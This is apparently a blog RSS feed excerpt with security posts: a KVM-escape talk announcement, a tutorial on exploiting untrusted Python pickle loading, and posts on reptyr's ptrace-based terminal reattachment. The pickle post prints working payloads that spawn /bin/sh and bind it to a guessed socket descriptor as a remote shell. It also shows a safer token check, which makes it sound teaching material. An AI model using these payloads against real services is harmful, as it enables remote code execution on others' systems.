<div style="width:425px; margin:auto; padding: 1em" id="__ss_8908773"><strong style="display:block;margin:12px 0 4px"><a href="http://www.slideshare.net/NelsonElhage/virtunoid-breaking-out-of-kvm" title="Virtunoid: Breaking out of KVM">Virtunoid: Breaking out of KVM</a></strong><object id="__sse8908773" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=kvm-defcon-2011-110818165327-phpapp02&#038;stripped_title=virtunoid-breaking-out-of-kvm&#038;userName=NelsonElhage" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed name="__sse8908773" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=kvm-defcon-2011-110818165327-phpapp02&#038;stripped_title=virtunoid-breaking-out-of-kvm&#038;userName=NelsonElhage" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"/></object></div>

<p><b>[Edited 2011-08-11]</b> The <a href="https://github.com/nelhage/virtunoid">code is now available</a>. It should be fairly well-commented, and include links to everything you&#8217;ll need to get the exploit up and running in a local test environment, if you&#8217;re so inclined.</p>

<p>In addition, as I mentioned, this bug was found by a simple KVM fuzzer I wrote. I&#8217;m also going to clean that up and release it, but don&#8217;t expect it too soon.</p>

<p>I had a great time meeting lots of interesting people at BlackHat and DEFCON, some that I&#8217;d met online and others I hadn&#8217;t. If any of you are ever in Boston, drop me a note and we can grab a beer or something.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Exploiting misuse of Python&#8217;s &#8220;pickle&#8221;</title>
		<link>http://blog.nelhage.com/2011/03/exploiting-pickle/</link>
		<comments>http://blog.nelhage.com/2011/03/exploiting-pickle/#comments</comments>
		<pubDate>Sun, 20 Mar 2011 22:38:13 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[pickle]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[twisted]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=469</guid>
		<description><![CDATA[If you program in Python, you&#8217;re probably familiar with the pickle serialization library, which provides for efficient binary serialization and loading of Python datatypes. Hopefully, you&#8217;re also familiar with the warning printed prominently near the start of pickle&#8217;s documentation: Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. [...]]]></description>
				<content:encoded><![CDATA[<p>If you program in Python, you&#8217;re probably familiar with the
<a href="http://docs.python.org/library/pickle.html"><code>pickle</code></a> serialization library, which provides for efficient
binary serialization and loading of Python datatypes. <em>Hopefully</em>,
you&#8217;re also familiar with the warning printed prominently near the
start of <code>pickle</code>&#8217;s documentation:</p>

<blockquote>
  <p><em>Warning:</em> The pickle module is not intended to be secure against
  erroneous or maliciously constructed data. Never unpickle data
  received from an untrusted or unauthenticated source.</p>
</blockquote>

<p>Recently, however, I stumbled upon a project that was accepting and
unpacking untrusted pickles over the network, and a poll of some
friends revealed that few of them were aware of just how easy it is to
exploit a service that does this. As such, this blog post will
describe exactly how trivial it is to exploit such a service, using a
simplified version of the code I recently encountered as an
example. Nothing in here is novel, but it&#8217;s interesting if you haven&#8217;t
seen it.</p>

<h2>The Target</h2>

<p>The vulnerable code was a <a href="http://twistedmatrix.com/">Twisted</a> server that listened over
SSL. The code looked roughly like the following:</p>


<div class="wp_syntax"><table><tr><td class="code"><pre class="python" style="font-family:monospace;"><span style="color: #ff7700;font-weight:bold;">class</span> VulnerableProtocol<span style="color: black;">&#40;</span>protocol.<span style="color: black;">Protocol</span><span style="color: black;">&#41;</span>:
  <span style="color: #ff7700;font-weight:bold;">def</span> dataReceived<span style="color: black;">&#40;</span><span style="color: #008000;">self</span><span style="color: #66cc66;">,</span> data<span style="color: black;">&#41;</span>:
&nbsp;
     <span style="color: #808080; font-style: italic;"># Code to actually parse incoming data according to an</span>
     <span style="color: #808080; font-style: italic;">#  internal state machine</span>
     <span style="color: #808080; font-style: italic;"># If we just finished receiving headers, call verifyAuth() to</span>
     <span style="color: #808080; font-style: italic;">#  check authentication</span>
&nbsp;
  <span style="color: #ff7700;font-weight:bold;">def</span> verifyAuth<span style="color: black;">&#40;</span><span style="color: #008000;">self</span><span style="color: #66cc66;">,</span> headers<span style="color: black;">&#41;</span>:
    <span style="color: #ff7700;font-weight:bold;">try</span>:
      <span style="color: #dc143c;">token</span> <span style="color: #66cc66;">=</span> <span style="color: #dc143c;">cPickle</span>.<span style="color: black;">loads</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">base64</span>.<span style="color: black;">b64decode</span><span style="color: black;">&#40;</span>headers<span style="color: black;">&#91;</span><span style="color: #483d8b;">'AuthToken'</span><span style="color: black;">&#93;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
      <span style="color: #ff7700;font-weight:bold;">if</span> <span style="color: #ff7700;font-weight:bold;">not</span> check_hmac<span style="color: black;">&#40;</span><span style="color: #dc143c;">token</span><span style="color: black;">&#91;</span><span style="color: #483d8b;">'signature'</span><span style="color: black;">&#93;</span><span style="color: #66cc66;">,</span> <span style="color: #dc143c;">token</span><span style="color: black;">&#91;</span><span style="color: #483d8b;">'data'</span><span style="color: black;">&#93;</span><span style="color: #66cc66;">,</span> getSecretKey<span style="color: black;">&#40;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>:
        <span style="color: #ff7700;font-weight:bold;">raise</span> AuthenticationFailed
      <span style="color: #008000;">self</span>.<span style="color: black;">secure_data</span> <span style="color: #66cc66;">=</span> <span style="color: #dc143c;">token</span><span style="color: black;">&#91;</span><span style="color: #483d8b;">'data'</span><span style="color: black;">&#93;</span>
    <span style="color: #ff7700;font-weight:bold;">except</span>:
      <span style="color: #ff7700;font-weight:bold;">raise</span> AuthenticationFailed</pre></td></tr></table></div>


<p>So, if we just send a request that looks something like:</p>

<pre><code>AuthToken: &lt;pickle here&gt;
</code></pre>

<p>The server will happily unpickle it.</p>

<h2>Executing Code</h2>

<p>So, what can we do with that? Well, <code>pickle</code> is supposed to allow us
to represent arbitrary objects. An obvious target is Python&#8217;s
<a href="http://docs.python.org/library/subprocess.html"><code>subprocess.Popen</code></a> objects &#8212; if we can trick the target
into instantiating one of those, they&#8217;ll be executing arbitrary
commands for us! To generate such a pickle, however, we can&#8217;t just
create a <code>Popen</code> object and pickle it; for various mostly-obvious
reasons, that won&#8217;t work. We could read up on the &#8220;pickle&#8221; format and
construct a stream by hand, but it turns out there is no need to.</p>

<p><code>pickle</code> allows arbitrary objects to declare how they should be
pickled by defining a <a href="http://docs.python.org/library/pickle.html#object.__reduce__"><code>__reduce__</code></a> method, which should
return either a string or a tuple describing how to reconstruct this
object on unpacking. In the simplest form, that tuple should just
contain</p>

<ul>
<li>A callable (which must be either a class, or satisfy some other,
odder, constraints), and</li>
<li>A tuple of arguments to call that callable on.</li>
</ul>

<p><code>pickle</code> will pickle each of these pieces separately, and then on
unpickling, will call the callable on the provided arguments to
construct the new object.</p>
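
<p>To see that mechanism in isolation, here is a harmless sketch (written for Python 3, where <code>cPickle</code> has been folded into <code>pickle</code>). The class name <code>Sneaky</code> is made up for illustration; its <code>__reduce__</code> asks the unpickler to call the builtin <code>int</code> on the string <code>"42"</code>, so what comes back is not a <code>Sneaky</code> at all:</p>

```python
import pickle


class Sneaky(object):
    """Hypothetical class: pickles as 'call int("42")' rather than as itself."""

    def __reduce__(self):
        # (callable, argument tuple): the unpickler will evaluate int("42").
        return (int, ("42",))


payload = pickle.dumps(Sneaky())
result = pickle.loads(payload)
print(type(result).__name__, result)
```

<p>Whoever calls <code>loads</code> ends up running a callable picked by whoever built the pickle, on arguments that the builder also picked.</p>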

<p>And so, we can construct a pickle that, when un-pickled, will execute
<code>/bin/sh</code>, as follows:</p>


<div class="wp_syntax"><table><tr><td class="code"><pre class="python" style="font-family:monospace;"><span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">cPickle</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">subprocess</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">base64</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">class</span> RunBinSh<span style="color: black;">&#40;</span><span style="color: #008000;">object</span><span style="color: black;">&#41;</span>:
  <span style="color: #ff7700;font-weight:bold;">def</span> __reduce__<span style="color: black;">&#40;</span><span style="color: #008000;">self</span><span style="color: black;">&#41;</span>:
    <span style="color: #ff7700;font-weight:bold;">return</span> <span style="color: black;">&#40;</span><span style="color: #dc143c;">subprocess</span>.<span style="color: black;">Popen</span><span style="color: #66cc66;">,</span> <span style="color: black;">&#40;</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'/bin/sh'</span><span style="color: #66cc66;">,</span><span style="color: black;">&#41;</span><span style="color: #66cc66;">,</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">print</span> <span style="color: #dc143c;">base64</span>.<span style="color: black;">b64encode</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">cPickle</span>.<span style="color: black;">dumps</span><span style="color: black;">&#40;</span>RunBinSh<span style="color: black;">&#40;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span></pre></td></tr></table></div>


<h2>Getting a Remote Shell</h2>

<p>At this point, we&#8217;ve basically won. We can run arbitrary shell
commands on the target, and there are any number of ways we could
bootstrap from here up to an interactive shell and whatever else we
might want.</p>

<p>For completeness, I&#8217;ll explain what I did, since it&#8217;s a moderately
cute trick. <code>subprocess.Popen</code> lets us select which file descriptors
to attach to stdin, stdout, and stderr for the new process by passing
integers for the <code>stdin</code> and similarly-named arguments, so we can open
our <code>/bin/sh</code> on arbitrarily-numbered fd&#8217;s.</p>
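
<p>As a harmless illustration of that integer-fd interface, the sketch below (Python 3, POSIX; the pipe and the child command are stand-ins for illustration, not part of the exploit) hands <code>Popen</code> the raw write end of a pipe as <code>stdout</code> and then reads the child&#8217;s output back from the other end:</p>

```python
import os
import subprocess
import sys

# A pipe gives us two plain integer file descriptors.
read_fd, write_fd = os.pipe()

# Pass the integer itself as stdout; the child writes to whatever that fd is.
child = subprocess.Popen(
    [sys.executable, "-c", "print('hello from the child')"],
    stdout=write_fd,
)
child.wait()
os.close(write_fd)

output = os.read(read_fd, 1024)
os.close(read_fd)
print(output)
```

<p>Nothing about the fd has to be a pipe; any open descriptor number in the calling process will do, including a socket.</p>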

<p>However, as mentioned above, the target server uses Twisted, and it
serves all requests in the same thread, using an asynchronous
event-driven model. This means we can&#8217;t necessarily predict which file
descriptor on the server will correspond to our socket, since it
depends on how many other clients are connected.</p>

<p>It also means, however, that every time we connect to the server,
we&#8217;ll open a new socket inside the same server process. So, let&#8217;s
guess that the server has fewer than, say, 20 concurrent connections
at the moment. If we connect to the server&#8217;s socket 20 times, that
will open 20 new file descriptors in the server. Since they&#8217;ll get
assigned sequentially, one of them will almost certainly be fd
20. Then, we can generate a pickle like so, and send it over:</p>


<div class="wp_syntax"><table><tr><td class="code"><pre class="python" style="font-family:monospace;"><span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">cPickle</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">subprocess</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">base64</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">class</span> Exploit<span style="color: black;">&#40;</span><span style="color: #008000;">object</span><span style="color: black;">&#41;</span>:
  <span style="color: #ff7700;font-weight:bold;">def</span> __reduce__<span style="color: black;">&#40;</span><span style="color: #008000;">self</span><span style="color: black;">&#41;</span>:
    fd <span style="color: #66cc66;">=</span> <span style="color: #ff4500;">20</span>
    <span style="color: #ff7700;font-weight:bold;">return</span> <span style="color: black;">&#40;</span><span style="color: #dc143c;">subprocess</span>.<span style="color: black;">Popen</span><span style="color: #66cc66;">,</span>
            <span style="color: black;">&#40;</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'/bin/sh'</span><span style="color: #66cc66;">,</span><span style="color: black;">&#41;</span><span style="color: #66cc66;">,</span> <span style="color: #808080; font-style: italic;"># args</span>
             <span style="color: #ff4500;">0</span><span style="color: #66cc66;">,</span>            <span style="color: #808080; font-style: italic;"># bufsize</span>
             <span style="color: #008000;">None</span><span style="color: #66cc66;">,</span>         <span style="color: #808080; font-style: italic;"># executable</span>
             fd<span style="color: #66cc66;">,</span> fd<span style="color: #66cc66;">,</span> fd    <span style="color: #808080; font-style: italic;"># std{in,out,err}</span>
             <span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">print</span> <span style="color: #dc143c;">base64</span>.<span style="color: black;">b64encode</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">cPickle</span>.<span style="color: black;">dumps</span><span style="color: black;">&#40;</span>Exploit<span style="color: black;">&#40;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span></pre></td></tr></table></div>


<p>We&#8217;ll open a <code>/bin/sh</code> on fd 20, which should be one of our 20
connections, and if all goes well, we&#8217;ll see a prompt printed to one
of those. We&#8217;ll send some junk on that fd until we manage to get the
original server to error out and close the connection, and we&#8217;ll be
left talking to <code>/bin/sh</code> over a socket. Game over.</p>
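
<p>The fd-guessing step relies on a POSIX guarantee: a newly opened descriptor always gets the lowest number that is currently free. A minimal sketch in Python 3, using <code>/dev/null</code> in place of sockets (an assumption made only to keep the example self-contained; sockets are numbered by the same rule):</p>

```python
import os

# Open a handful of descriptors back to back; each takes the lowest free slot,
# so the numbers come out strictly increasing.
fds = [os.open(os.devnull, os.O_RDONLY) for _ in range(5)]
print(fds)

# Free the first one and open again: the freed number is handed straight back.
freed = fds[0]
os.close(freed)
reused = os.open(os.devnull, os.O_RDONLY)
print(freed, reused)

# Clean up everything that is still open.
for fd in fds[1:] + [reused]:
    os.close(fd)
```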

<h2>In Conclusion</h2>

<p>Again, nothing here should be novel, nor would I expect any of these
pieces to take a competent hacker more than a few minutes to figure out,
given the problem. But if this blog post teaches someone not to use
<code>pickle</code> on untrusted data, then it will be worth it.</p>
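
<p>For a concrete alternative, here is a rough sketch of a token check that authenticates the raw bytes <em>before</em> parsing them, and parses them with <code>json</code> rather than <code>pickle</code>. This is not the code of the service described above: the token layout (a 32-byte HMAC-SHA256 tag followed by a JSON body), <code>SECRET_KEY</code>, <code>sign_token</code> and <code>verify_token</code> are all assumptions made for illustration.</p>

```python
import base64
import hashlib
import hmac
import json

# Assumption: a placeholder standing in for the service's getSecretKey().
SECRET_KEY = b"hypothetical-shared-secret"
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def sign_token(data, key=SECRET_KEY):
    """Serialize data as JSON and prepend an HMAC-SHA256 tag over the bytes."""
    body = json.dumps(data, sort_keys=True).encode("utf-8")
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return base64.b64encode(tag + body).decode("ascii")


def verify_token(header_value, key=SECRET_KEY):
    """Check the tag over the raw bytes first; only then parse the body."""
    raw = base64.b64decode(header_value)
    tag, body = raw[:TAG_LEN], raw[TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed")
    return json.loads(body.decode("utf-8"))


token = sign_token({"user": "alice"})
print(verify_token(token))
```

<p>The ordering is the point: nothing that came from the network gets interpreted until the signature over the exact bytes has checked out, and even then the parser can only produce plain data.</p>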
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/03/exploiting-pickle/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>reptyr: Changing a process&#8217;s controlling terminal</title>
		<link>http://blog.nelhage.com/2011/02/changing-ctty/</link>
		<comments>http://blog.nelhage.com/2011/02/changing-ctty/#comments</comments>
		<pubDate>Wed, 09 Feb 2011 03:06:50 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[reptyr]]></category>
		<category><![CDATA[termios]]></category>
		<category><![CDATA[tty]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=461</guid>
		<description><![CDATA[reptyr (announced recently on this blog) takes a process that is currently running in one terminal, and transplants it to a new terminal. reptyr comes from a proud family of similar hacks, and works in the same basic way: We use ptrace(2) to attach to a target process and force it to execute code of [...]]]></description>
				<content:encoded><![CDATA[<p><a href="https://github.com/nelhage/reptyr">reptyr</a> (<a href="http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/">announced</a> recently on this blog) takes a
process that is currently running in one terminal, and transplants it
to a new terminal. <code>reptyr</code> comes from a proud family of similar
hacks, and works in the same basic way: We use <a href="http://linux.die.net/man/2/ptrace"><code>ptrace(2)</code></a>
to attach to a target process and force it to execute code of our own
choosing, in order to open the new terminal, and <code>dup2(2)</code> it over
stdout and stderr.</p>

<p>The main special feature of <code>reptyr</code> is that it actually changes the
controlling terminal of the target process. The &#8220;controlling terminal&#8221;
is a concept maintained by UNIX operating systems that is independent
of a process&#8217;s file descriptors. The controlling terminal governs
details like where <code>^C</code> gets delivered, and how applications are
notified of changes in window size.</p>

<p>Processes are grouped into two levels of hierarchical groups:
sessions, and process groups. Each group is named by an ID, which is
the PID of the initial <strong>leader</strong> (either &#8220;session leader&#8221; or &#8220;process
group leader&#8221;). Even if the leader exits, that number is still the ID
for the group. Sessions are used for terminal management &#8212; Every
process in a session has the same controlling terminal, and each
terminal belongs to at most one session. Process groups are a
sub-division within sessions, and are used primarily for job control
within the shell. For a more in-depth explanation, see <a href="http://blog.nelhage.com/2010/01/a-brief-introduction-to-termios-signaling-and-job-control/">part
3</a> of my earlier series on termios.</p>

<p>If you check out <code>tty_ioctl(4)</code>, you&#8217;ll find that Linux has an
<code>ioctl</code>, <code>TIOCSCTTY</code>, that can be used to set the controlling terminal
of a process, and you could be forgiven for thinking that all we need
is to make the target call that ioctl, and we&#8217;re done.</p>

<p>However, if we read closer, we find that it has several
restrictions. In particular:</p>

<blockquote>
  <p>The calling process must be a session leader and not have a
  controlling terminal already.  If this terminal is already the
  controlling terminal of a different session group then the ioctl fails
  with EPERM […]</p>
</blockquote>

<p>In the typical case, where you&#8217;re trying to attach, say, a <code>mutt</code> that
you spawned from your shell, <code>mutt</code> won&#8217;t be a session leader &#8212; your
shell will be the session leader, and <code>mutt</code> will be the process group
leader for a process group containing only itself.</p>

<p>So, we need to make the target a session leader. Conveniently, there&#8217;s
a system call for that: <code>setsid(2)</code>.</p>

<p>However, reading that man page, we find a new caveat: <code>setsid(2)</code>
fails with <code>EPERM</code> if</p>

<blockquote>
  <p>The process group ID of any process equals the PID of the calling
  process.  Thus, in particular, setsid() fails if the calling process
  is already a process group leader.</p>
</blockquote>

<p>The shell creates a new process group for every job you launch, and so
our target <code>mutt</code> will be a process group leader, and unable to
<code>setsid()</code>. The usual solution for programs that want to setsid is to
<code>fork()</code>, so that the child is still in the parent&#8217;s session and
process group, and then <code>setsid()</code> in the child. However, <code>fork()</code>ing
our <code>mutt</code> and killing off the parent seems potentially disruptive, so
let&#8217;s see if we can avoid that.</p>

<p>So, we&#8217;re going to need to change <code>mutt</code>&#8217;s process group ID, so that
there are no processes with process group IDs equal to its
PID. Following some trusty <em><code>SEE ALSO</code></em> links, we get to
<code>setpgid(2)</code>. There&#8217;s a bunch of text in that man page, but the key
bit is:</p>

<blockquote>
  <p>If setpgid() is used to move a process from one process group to
  another, both process groups must be part of the same session (see
  setsid(2) and credentials(7)).  In this case, the pgid specifies an
  existing process group to be joined and the session ID of that group
  must match the session ID of the joining process.</p>
</blockquote>

<p>We need to find a process group in the same session as <code>mutt</code> to move
our <code>mutt</code> into, and then we&#8217;ll be able to <code>setsid</code>. We could try to
find one &#8212; the shell is a plausible candidate, for instance &#8212; but
there&#8217;s an alternate, more direct route: Create one.</p>

<p>While we have <code>mutt</code> captured with <code>ptrace</code>, we can make it <code>fork(2)</code>
a dummy child, and start tracing that child, too. We&#8217;ll make the child
<code>setpgid</code> to make it into its own process group, and then get <code>mutt</code>
to <code>setpgid</code> itself into the child&#8217;s process group. <code>mutt</code> can then
<code>setsid</code>, moving into a new session, and now that it is a session leader, we
can finally make it call <code>ioctl(TIOCSCTTY)</code> on the new terminal, and we win.</p>
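
<p>The same sequence of system calls can be sketched in Python 3 without <code>ptrace</code>, by having a cooperating process perform them on itself. This is only an illustration of the ordering, not reptyr&#8217;s implementation (which injects the calls into an unmodified target); the function names are invented here, and a throwaway child stands in for <code>mutt</code>:</p>

```python
import fcntl
import os
import signal
import termios


def escape_into_new_session():
    """Make the calling process a session leader without forking it away.

    Meant for a process that is currently a process group leader, for which
    a plain setsid() would fail with EPERM.
    """
    dummy = os.fork()
    if dummy == 0:
        # Dummy child: sit in its own process group until it is killed.
        os.setpgid(0, 0)
        while True:
            signal.pause()
    try:
        # Also set the child's group from the parent, so the group is certain
        # to exist before we try to join it (the usual job-control idiom).
        os.setpgid(dummy, dummy)
        os.setpgid(0, dummy)  # leave our own group, join the dummy's
        os.setsid()           # no process group is named after our PID now
    finally:
        os.kill(dummy, signal.SIGKILL)
        os.waitpid(dummy, 0)


def adopt_terminal(tty_fd):
    """As a session leader with no controlling terminal, claim tty_fd as one."""
    fcntl.ioctl(tty_fd, termios.TIOCSCTTY, 0)


def demo(with_tty=False):
    """Run the sequence in a throwaway child; return True if it worked."""
    pid = os.fork()
    if pid == 0:
        ok = False
        try:
            os.setpgid(0, 0)  # group leader, as a shell job would be
            escape_into_new_session()
            if with_tty:
                _master, slave = os.openpty()
                adopt_terminal(slave)
            ok = os.getsid(0) == os.getpid()
        finally:
            os._exit(0 if ok else 1)
    _, status = os.waitpid(pid, 0)
    return os.WIFEXITED(status) and os.WEXITSTATUS(status) == 0


print(demo())
```

<p>With <code>with_tty=True</code> the stand-in also allocates a fresh pty with <code>os.openpty()</code> and claims it as its controlling terminal; that last step needs a system where ptys are available.</p>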

<p>It turns out I didn&#8217;t invent this technique &#8212; <a href="http://blog.habets.pp.se/2009/03/Moving-a-process-to-another-terminal">injcode</a> and
<a href="http://caca.zoy.org/wiki/neercs">neercs</a> work the same way. But I did discover it
independently of them, and it was a fun little hunt through unix
arcana.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/02/changing-ctty/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>reptyr: Attach a running process to a new terminal</title>
		<link>http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/</link>
		<comments>http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/#comments</comments>
		<pubDate>Sat, 22 Jan 2011 01:56:01 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Low-level hacking]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[ptrace]]></category>
		<category><![CDATA[reptyr]]></category>
		<category><![CDATA[screenify]]></category>
		<category><![CDATA[termios]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=450</guid>
		<description><![CDATA[Over the last week, I&#8217;ve written a nifty tool that I call reptyr. reptyr is a utility for taking an existing running program and attaching it to a new terminal. Started a long-running process over ssh, but have to leave and don&#8217;t want to interrupt it? Just start a screen, use reptyr to grab it, [...]]]></description>
				<content:encoded><![CDATA[<p>Over the last week, I&#8217;ve written a nifty tool that I call
<a href="http://github.com/nelhage/reptyr">reptyr</a>. reptyr is a utility for taking an existing running
program and attaching it to a new terminal. Started a long-running
process over ssh, but have to leave and don&#8217;t want to interrupt it?
Just start a screen, use reptyr to grab it, and then kill the ssh
session and head on home.</p>

<p>You can <a href="http://github.com/nelhage/reptyr">grab the source</a>, or read on for some more details.</p>

<p>There&#8217;s a shell script called <a href="http://tomaw.net/tmp/screenify">screenify</a> that&#8217;s been going
around the internet for nigh on 10 years now that is supposed to use
gdb to accomplish the same thing. There&#8217;s also a project called
<a href="http://pasky.or.cz/~pasky/dev/retty/">retty</a> that tries to do the same thing, in C using <code>ptrace()</code>
directly.</p>

<p>The difference between those programs and reptyr is that reptyr works
much, much better.</p>

<p>If you attach a <code>less</code> using screenify or retty, it will still take
input from the old terminal. If you attach an ncurses program, and
resize the window, the program probably won&#8217;t resize correctly. <code>^C</code>
and <code>^Z</code> will still be processed on the old terminal &#8212; typing them in
the new terminal won&#8217;t do anything useful.</p>

<p>reptyr fixes all of these problems and more, and is the only such tool
I know of that does so. I&#8217;ve never seen a program that doesn&#8217;t behave
noticeably incorrectly after attaching with retty or screenify,
whereas with reptyr most programs I have tried work flawlessly.</p>

<h2>How does it work?</h2>

<p><code>reptyr</code> works in the same basic way as <code>screenify</code> and <code>retty</code> &#8212; it
attaches to the target process using the <code>ptrace</code> API, opens the new
terminal, and <code>dup2</code>s it over the old file descriptors. It also copies
the termios settings from the old terminal to the new terminal.</p>

<p>The main thing that reptyr does that no one else does is that it
actually changes the controlling terminal of the process you are
attaching. This is the detail that makes many things Just Work,
including <code>^C</code> and <code>^Z</code> and window resizing.</p>

<p>Switching the target&#8217;s controlling terminal is not easy and involves a
fair bit of trickery with <code>ptrace</code> and Linux&#8217;s terminal APIs. I will
probably do another blog post some time about the dirty details of how
I make this work, but for now you can check out
<a href="https://github.com/nelhage/reptyr/blob/master/attach.c">attach.c</a> if
you really want to know.</p>

<p>reptyr still has a number of limitations &#8212; it doesn&#8217;t generally work,
for example, if the target process has any children. I know how to fix
most of these problems, though, so expect it to get better with
time. Please let me know if you find it useful!</p>

<h2>Appendix</h2>

<p>(Edited to add:) Nothing is really new. A commenter on reddit pointed out that <a href="http://blog.habets.pp.se/2009/03/Moving-a-process-to-another-terminal">injcode</a>
and <a href="http://caca.zoy.org/wiki/neercs">neercs</a> both accomplish the same thing, even using the same trick
to change the CTTY. Ah well, I had fun writing it anyways, and apparently I
wasn&#8217;t the only one who didn&#8217;t know about the existing alternatives. <code>neercs</code> is a full screen replacement, though, and I think that reptyr should be more robust than <code>injcode</code> &#8212; I use a different technique for <code>ptrace</code>-hijacking, for example &#8212; and so hopefully this tool still has a niche as a more robust standalone utility. Certainly, judging from the amount of enthusiasm I&#8217;ve seen for this tool, this still isn&#8217;t a problem that is solved to the average user&#8217;s satisfaction.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/feed/</wfw:commentRss>
		<slash:comments>57</slash:comments>
		</item>
		<item>
		<title>Some Android reverse-engineering tools</title>
		<link>http://blog.nelhage.com/2010/12/some-android-reverse-engineering-tools/</link>
		<comments>http://blog.nelhage.com/2010/12/some-android-reverse-engineering-tools/#comments</comments>
		<pubDate>Mon, 27 Dec 2010 20:26:13 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Low-level hacking]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[dalvik]]></category>
		<category><![CDATA[dedexer]]></category>
		<category><![CDATA[reverse-engineering]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=436</guid>
		<description><![CDATA[I&#8217;ve spent a lot of time this last week staring at decompiled Dalvik assembly. In the process, I created a couple of useful tools that I figure are worth sharing. I&#8217;ve been using dedexer instead of baksmali, honestly mainly because the former&#8217;s output has fewer blank lines and so is more readable on my netbook&#8217;s [...]]]></description>
				<content:encoded><![CDATA[<p>I&#8217;ve spent a lot of time this last week staring at decompiled Dalvik
assembly. In the process, I created a couple of useful tools that I
figure are worth sharing.</p>

<p>I&#8217;ve been using <a href="http://dedexer.sourceforge.net/">dedexer</a> instead of <a href="http://code.google.com/p/smali/">baksmali</a>,
honestly mainly because the former&#8217;s output has fewer blank lines and
so is more readable on my netbook&#8217;s screen. Thus, these tools are
designed to work with the output of dedexer, but the formats are
simple enough that they should be easily portable to smali, if that&#8217;s
your tool of choice (And it does look like a better tool overall, from
what I can see).</p>

<h2><code>ddx.el</code></h2>

<p>I&#8217;m an emacs junkie, and I can&#8217;t stand it when I have to work with a
file that doesn&#8217;t have an emacs mode. So, a day into staring at
un-highlighted <code>.ddx</code> files in <code>fundamental-mode</code>, I broke down and
threw together <a href="https://github.com/nelhage/reverse-android/blob/master/ddx.el"><code>ddx-mode</code></a>. It&#8217;s fairly minimal, but it
provides functional syntax highlighting, and a little support for
navigating between labels. One cute feature I threw in is that, if you
move the point over a label, any other instances of that label get
highlighted, which I found useful in keeping track of all the &#8220;lXXXXX&#8221;
labels dedexer generates.</p>

<div id="attachment_438" class="wp-caption aligncenter" style="width: 509px"><a href="http://blog.nelhage.com/wp-content/uploads/2010/12/ddx-e1293480505629.png"><img src="http://blog.nelhage.com/wp-content/uploads/2010/12/ddx-e1293480505629.png" alt="" title="ddx-mode" width="499" height="471" class="size-full wp-image-438" /></a><p class="wp-caption-text">An example file (from k9mail) highlighted using ddx-mode</p></div>

<h2><code>ddx2dot</code></h2>

<p>Dalvik assembly is, on the whole, pretty easy to read, but occasionally
you stumble on huge methods that clearly originated from multiple
nested loops and some horrible chained if statements. And what you&#8217;d
really like is to be able to see the structure of the code, as much as
the details of the instructions.</p>

<p>To that end, I threw together a Python script that &#8220;parses&#8221; <code>.ddx</code>
files, and renders them to a control-flow graph using <a href="http://www.graphviz.org/">dot</a>. As
an example, the <a href="http://code.google.com/p/k9mail/source/browse/k9mail/trunk/src/com/fsck/k9/mail/store/ImapResponseParser.java?r=2996#119"><code>parseToken</code></a> method from the IMAP parser
